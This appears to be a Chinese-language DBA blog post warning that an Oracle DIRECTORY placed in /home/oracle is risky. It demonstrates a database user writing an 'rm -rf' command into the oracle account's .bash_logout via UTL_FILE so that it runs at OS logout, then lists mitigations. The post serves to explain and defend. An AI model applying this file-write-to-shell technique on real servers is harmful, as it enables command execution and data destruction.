oracle create directory,oracle中create directory建在/home/oracle下可能存在的风险

impdp/expdp等是需要建目录进行导入导出的,如果oracle中建一个driectory在/home/oracle下,这样只要有对这个directory进行write权限的数据库用户,

再加上默认就有对utl_file包的execute权限,就可以做很多事情.

以下演示:

##在/home/oracle下,建一个文本文件

[oracle@ct6605 ~]$ touch /home/oracle/abc.txt

[oracle@ct6605 ~]$ ll /home/oracle/abc.txt

-rw-r--r-- 1 oracle oinstall 0 Oct 19 11:09 /home/oracle/abc.txt

[oracle@ct6605 ~]$ sqlplus system/system

SQL*Plus: Release 11.2.0.4.0 Production on Mon Oct 19 11:04:31 2015

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:

Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production

With the Partitioning, OLAP, Data Mining and Real Application Testing options

--在/home/oracle下建一个direcotry

SQL> create directory home_dump as '/home/oracle';

Directory created.

--启用scott,用以测试

SQL> alter user scott account unlock;

User altered.

SQL> alter user scott identified by system;

User altered.

--授给scott对home_dump的写权限

SQL> grant write on directory home_dump to scott;

Grant succeeded.

SQL> conn scott/system

Connected.

--通过utl_file,修改/home/oracle/.bash_profile下的文件,使当oracle用户登入linux又登出时,自动执行此脚本,此处可以操作所以oracle用户有权限的文件,

这里只是删除一个abc.txt,如果改成删除oracle的数据文件加备份,后果就比较严重了.

SQL> DECLARE

t_fh utl_file.file_type;

begin

t_fh := utl_file.fopen('HOME_DUMP','.bash_logout','w');

utl_file.put_line(t_fh,'rm -rf /home/oracle/abc.txt');

utl_file.fclose(t_fh);

end;   2    3    4    5    6    7

8  /

PL/SQL procedure successfully completed.

SQL> exit

[oracle@ct6605 ~]$ cat .bash_logout

rm -rf /home/oracle/abc.txt

[oracle@ct6605 ~]$ exit

logout

--这里可以看到/home/oracle/abc.txt已经被删除了

[root@ct6605 ~]# ll /home/oracle/abc.txt

ls: cannot access /home/oracle/abc.txt: No such file or directory

可以看到,要防止此问题的发生,就要管控好directory的create,write权限,尽量去掉public的utl_file包execute权限.

另外顺便提一下,mysql中,select ... into outfile同样存在类似风险.